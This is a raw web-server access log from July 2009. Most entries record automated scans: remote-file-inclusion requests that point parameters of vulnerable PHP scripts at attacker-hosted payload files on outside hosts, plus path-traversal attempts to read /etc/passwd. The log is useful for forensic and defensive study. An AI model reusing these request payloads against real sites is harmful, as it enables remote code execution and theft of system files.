69.132.134.198 - - [26/Jul/2009:12:02:21 -0700] "GET /logs/access_080708.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:37 -0700] "GET /logs/access_080708.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:37 -0700] "GET /logs/access_080527.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:02:37 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:12:03:24 -0700] "GET /logs/access_080919.log%20%20//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:31 -0700] "GET /%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:31 -0700] "GET /logs/%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /logs/access_080313.log/%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /%3Chtml%3E%3Chead%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /logs/%3Chtml%3E%3Chead%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /logs/access_080313.log/%3Chtml%3E%3Chead%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /logs/%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:32 -0700] "GET /logs/access_080313.log/%3Ctitle%3E404%20Not%20Found%3C/title%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /%3C/head%3E%3Cbody%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /logs/%3C/head%3E%3Cbody%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /logs/access_080313.log/%3C/head%3E%3Cbody%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /%3Ch1%3ENot%20Found%3C/h1%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /logs/%3Ch1%3ENot%20Found%3C/h1%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:33 -0700] "GET /logs/access_080313.log/%3Ch1%3ENot%20Found%3C/h1%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /%3Cp%3EThe%20requested%20URL%20/news/images/bugz/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /logs/access_080313.log/%3Cp%3EThe%20requested%20URL%20/news/images/bugz/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /logs/%3Cp%3EThe%20requested%20URL%20/news/images/bugz/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /%3Chr%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /logs/access_080313.log/%3Chr%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:34 -0700] "GET /logs/%3Chr%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:35 -0700] "GET /%3Caddress%3EApache/2.2.3%20(Debian)%20mod_python/3.2.10%20Python/2.4.4%20PHP/4.4.4-8+etch2%20mod_ssl/2.2.3%20OpenSSL/0.9.8c%20mod_perl/2.0.2%20Perl/v5.8.8%20Server%20at%20www.suiteinn.it%20Port%2080%3C/address%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:35 -0700] "GET /logs/access_080313.log/%3Caddress%3EApache/2.2.3%20(Debian)%20mod_python/3.2.10%20Python/2.4.4%20PHP/4.4.4-8+etch2%20mod_ssl/2.2.3%20OpenSSL/0.9.8c%20mod_perl/2.0.2%20Perl/v5.8.8%20Server%20at%20www.suiteinn.it%20Port%2080%3C/address%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:35 -0700] "GET /logs/%3Caddress%3EApache/2.2.3%20(Debian)%20mod_python/3.2.10%20Python/2.4.4%20PHP/4.4.4-8+etch2%20mod_ssl/2.2.3%20OpenSSL/0.9.8c%20mod_perl/2.0.2%20Perl/v5.8.8%20Server%20at%20www.suiteinn.it%20Port%2080%3C/address%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:12:03:35 -0700] "GET /logs/access_080906.log%20%20//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:35 -0700] "GET /%3C/body%3E%3C/html%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:35 -0700] "GET /logs/access_080313.log/%3C/body%3E%3C/html%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:12:03:38 -0700] "GET /logs/%3C/body%3E%3C/html%3Ehttp://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:06:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:06:04 -0700] "GET /include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:06:04 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:06:12 -0700] "GET /logs/access_080906.log//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:06:46 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:06:46 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:06:46 -0700] "GET /logs/access_090523.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:06:54 -0700] "GET /logs/access_080708.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:06:54 -0700] "GET /logs/access_080527.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:06:55 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:06:58 -0700] "GET /logs/access_080211.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:06:59 -0700] "GET /logs/access_080527.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:06:59 -0700] "GET /logs/access_080708.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:12:07:54 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:08:06 -0700] "GET /logs/access_080708.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.132.134.198 - - [26/Jul/2009:12:08:07 -0700] "GET /logs/access_080527.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://r00t3r.i-was-in-paris.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:08:10 -0700] "GET /logs/access_080919.log%20%20//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:08:15 -0700] "GET /logs/access_080906.log%20%20//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:08:18 -0700] "GET /logs/access_080315.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:12:08:18 -0700] "GET /logs/access_080211.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/access_080904.log/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/access_080904.log/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/access_080904.log/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:30 -0700] "GET /logs/index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:12:08:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:12:08:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:12:08:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.55.108.173 - - [26/Jul/2009:12:08:33 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/4.0" "www.dmulk.com"
65.55.108.173 - - [26/Jul/2009:12:08:38 -0700] "GET /bikes/dteel/2008_10_18/IMG_5421.JPG HTTP/1.1" 200 3459478 "-" "Mozilla/4.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:46 -0700] "GET /index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 200 21001 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:57 -0700] "GET /index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 200 21001 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:12:08:57 -0700] "GET /index.php?menu=deti&page=http://aboutav.com//id1.txt??? HTTP/1.1" 200 21001 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:12:09:50 -0700] "GET /bikes/dteel/2008_09_13/?N=D HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:12:10:10 -0700] "GET /logs/access_080330.log/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:12:10:10 -0700] "GET /?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.0" 200 21126 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:12:10:10 -0700] "GET /logs/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 200 110055 "-" "Mozilla/5.0" "www.dmulk.com"
220.181.61.224 - - [26/Jul/2009:12:10:48 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:10:51 -0700] "GET /logs/access_080616.log/index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:12:10:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:10:56 -0700] "GET /logs/index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:11:06 -0700] "GET /index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 21029 "-" "libwww-perl/5.814" "www.dmulk.com"
220.181.61.224 - - [26/Jul/2009:12:12:21 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:13:58 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:13:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:13:58 -0700] "GET /logs/access_080323.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:13:58 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:14:13 -0700] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:14:13 -0700] "GET /logs/access_080323.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:14:47 -0700] "GET /logs/access_080409.log/index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:12:15:34 -0700] "GET /logs/access_090119.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:17:45 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:17:45 -0700] "GET /logs/access_080708.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:17:45 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:17:49 -0700] "GET /logs/access_080406.log/index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:12:17:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:17:54 -0700] "GET /logs/index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.84.204.122 - - [26/Jul/2009:12:18:05 -0700] "GET /index.php?mod=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 21029 "-" "libwww-perl/5.814" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:18:48 -0700] "GET /logs/access_080627.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:19:38 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:19:38 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:19:38 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:20:33 -0700] "GET /logs/access_080318.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:21:17 -0700] "GET /logs/access_080616.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:21:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:21:17 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:21:20 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:48 -0700] "GET /logs/access_081201.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:48 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:48 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:50 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:21:50 -0700] "GET /logs/access_081201.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:09 -0700] "GET /logs/access_080513.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:09 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:22:11 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:22:11 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:22:11 -0700] "GET /logs/access_081201.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:17 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
